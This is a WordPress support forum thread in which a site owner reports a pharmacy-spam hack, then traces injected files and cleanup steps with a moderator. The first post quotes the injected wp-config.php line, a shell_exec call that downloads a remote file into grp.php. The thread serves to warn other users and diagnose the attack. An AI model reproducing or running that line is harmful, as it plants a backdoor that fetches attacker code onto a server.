WordPress.org

Ready to get started?Download WordPress

Forums

Site Hacked - grp.php File (8 posts)

  1. clindsey
    Member
    Posted 4 years ago #

    I got a Google Alert today that shower a pharmacy link with my website. I went out and did a site search through Google and found spammy links and posts with pharmacy and drug type titles.

    I started looking around, and immediately noticed this line at the top of my wp-config.php file:
    <?php shell_exec('/usr/bin/GET http://boiledeggstudios.com/JJ/grp.txt > ./grp.php'); ?>

    I also noticed a new file in my WordPress root directory called grp.php, which contains this (link to WordPress pastebin).

    The links in the Google site search that are pharmacy links redirect off my site to a pharmacy of some kind.

    I'm not sure where the vulnerability is. I'm current on my WordPress install (3.0). And I'm currently working to clean up the damage, and also check my other installs of WordPress.

    I'm not looking for help cleaning up the site, I just wanted to inform everyone to be on the lookout.

  2. clindsey
    Member
    Posted 4 years ago #

    Followup: This doesn't seem to be the Pharma Hack that was described recently. There are no added files in the Akismet plugin folder. None of the malicious code/entries were in my database.

    Besides the config file and grp.php file I described above, the only thing out-of-place I see are some entries in wp-options. The first option in the table is _transient_random_seed. I don't think I've ever seen that before, but I'm not sure, it could not be a sign of the hack. I also noticed entries for _transient_doing_cron and _transient_timeout_feed_mod_a5420c83891a9c88ad2a4f04584a5efc (and there were many similar to that last one).

    I don't see any strange posts in the database, and there are no additional users.

  3. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

  4. clindsey
    Member
    Posted 4 years ago #

    Rev. Voodoo, thanks for the links. I was posting so people can maybe figure out what the vulnerability is and maybe some other users won't get hit by the same attack.

    That said, I think I've found the damaging code. In wp-blog-header.php in the WordPress root folder, I found this at the top (link to WordPress pastebin)

    Taking that out kills the redirects to the pharmacy site.

  5. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    good find, but now you gotta follow that rabbit down the hole.... how did it get there? Also, what allowed that to be written there?

    Perhaps a php file hidden somewhere in your server? Access logs (if available) can sometimes help you see if another file was used to write to that file.

  6. clindsey
    Member
    Posted 4 years ago #

    I think I found it. There is an additional file at /install/wp-includes/pomo/ The file is pm.php.

  7. Rev. Voodoo
    Volunteer Moderator
    Posted 4 years ago #

    yep, I definitely don't have that file in a clean install

  8. djanym
    Member
    Posted 3 years ago #

    i have the same hackers code in my wp... i think i got this from some plugin

Topic Closed

This topic has been closed to new replies.

About this Topic